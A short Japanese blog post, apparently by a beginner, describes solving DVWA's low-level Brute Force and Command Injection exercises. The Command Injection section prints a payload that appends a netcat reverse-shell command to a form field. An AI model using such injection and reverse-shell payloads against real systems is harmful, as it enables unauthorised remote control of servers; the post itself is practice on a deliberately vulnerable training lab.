dvwaのlowレベルを制覇したい(1)

ハッカー初心者なのでまずはdvwaを攻略してみようと思う。

DVWAは各種攻撃手法を練習するのに最適っぽい

DVWAってよくありそうなアプリケーションを自由に攻撃するものかと思っていたが、どうやら攻撃手法ごとに画面が用意してあって、それに対して攻撃を仕掛けるというものらしい。
なんとなく攻撃手法は知識としては知っているし、ちょくちょく攻撃したこともあるが久々なので改めてLowレベルを制覇するところから始める

BruteForce

一番上のbrute forceからやってみる。
既にログイン済みの管理者IDでログインしてみたら普通に通ってしまった。
これはBruteForceするまでもなかった。

Command Injection

これも簡単。
;をつけてみたら自由にコマンドを実行できた。

リバースシェルも試してみる。
以下を送信してみたらリバースシェルを起動することも成功した。
これで成功でいいはず

; nc <IP> <Port> -e /bin/bash

リバースシェルの仕組みについては今度詳しく調べてみよう。
確かSSHのような操作性を持たせるようにすることもできたはずだけど、もう何も覚えてないな。